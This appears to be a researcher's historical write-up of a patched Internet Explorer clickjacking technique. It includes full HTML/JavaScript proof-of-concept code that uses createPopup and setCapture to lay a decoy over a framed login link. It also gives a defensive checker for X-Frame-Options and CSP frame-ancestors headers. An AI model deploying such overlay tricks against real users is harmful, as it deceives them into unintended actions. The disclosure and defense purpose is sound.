Combining createPopup and setCapture produced a clean clickjacking setup. The popup appeared over the target iFrame as a visible overlay, but because setCapture redirected mouse input to the main document, clicks landing on the popup were actually delivered to the iFrame content beneath it — making the popup effectively invisible to click events while remaining visually opaque.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ClickJack_createPopup_setCapture</title>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
</head>
<body>
<iframe sandbox src="http://en.wikipedia.org/wiki/Clickjacking" width="800" height="220"></iframe>
<script>
function main()
{
    document.body.onclick = function()
    {
        document.body.releaseCapture();
        document.body.onclick = null;
    }
    setTimeout("document.body.setCapture();", 1000);
    var cp = createPopup();
    cp.document.bgColor = "red";
    cp.show(740, 12, 34, 16, document.all.tags("iframe")[0]);
}
</script>
</body>
</html>
The red popup covered the Wikipedia “Log in” link exactly, but setCapture on document.body caused all mouse events to be delivered to the body element instead — which then propagated them through to the iFrame below the popup. A user clicking on what appeared to be the attacker’s red box was actually clicking on the iFrame’s content. This is a nice illustration of why setCapture and overlay elements need to be considered together in clickjacking defenses.
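On the framed site's side, the setup only works if the page agrees to render inside a cross-origin frame, and because the iframe carries the sandbox attribute without allow-scripts, a JavaScript frame-buster in the framed page never runs, so the response headers are the defense that counts. The check below is an added example, not code from the original PoC: it evaluates X-Frame-Options and CSP frame-ancestors for a current browser and for IE, which does not implement frame-ancestors. The function names and the .example origins are assumptions made for the illustration.

```javascript
// Added example. Origins are scheme://host strings; ports and nested frames are not modelled.

// Return the frame-ancestors source list from a CSP header value, or null if absent.
function frameAncestors(csp) {
  for (const directive of (csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") return sources;
  }
  return null;
}

// Match one CSP source expression against the framing origin.
function sourceMatches(source, framer, page) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return framer === page;
  if (s === "*") return true;
  const m = /^(https?:\/\/)\*\.(.+)$/.exec(s); // wildcard host, e.g. https://*.partner.example
  if (m) return framer.startsWith(m[1]) && framer.endsWith("." + m[2]);
  return s === framer;
}

// Evaluate X-Frame-Options. ALLOW-FROM is honoured only when `legacy` is true.
function xfoAllows(xfo, framer, page, legacy) {
  const v = (xfo || "").trim();
  const u = v.toUpperCase();
  if (u === "DENY") return false;
  if (u === "SAMEORIGIN") return framer === page;
  if (legacy && u.startsWith("ALLOW-FROM "))
    return v.slice(11).trim().toLowerCase().replace(/\/$/, "") === framer;
  return true; // header absent or value not recognised: no restriction
}

// headers: object with lower-cased names, as Node's http module delivers them.
function canBeFramed(headers, pageOrigin, framerOrigin) {
  const page = pageOrigin.toLowerCase();
  const framer = framerOrigin.toLowerCase();
  const fa = frameAncestors(headers["content-security-policy"]);
  const xfo = headers["x-frame-options"];
  return {
    // Browsers that implement frame-ancestors ignore X-Frame-Options when it is present.
    modern: fa ? fa.some((s) => sourceMatches(s, framer, page)) : xfoAllows(xfo, framer, page, false),
    // IE has no frame-ancestors support, so only X-Frame-Options counts there.
    legacyIE: xfoAllows(xfo, framer, page, true),
  };
}

// Constructed sample: a CSP-only policy stops framing in current browsers but not in IE.
const PAGE = "https://wiki.example", FRAMER = "https://other.example";
console.log(canBeFramed({ "content-security-policy": "frame-ancestors 'none'" }, PAGE, FRAMER));
```

A result with legacyIE set to true means a visitor on the browser generation this PoC targeted could still be shown the page inside a third-party frame, whatever the CSP says.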
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.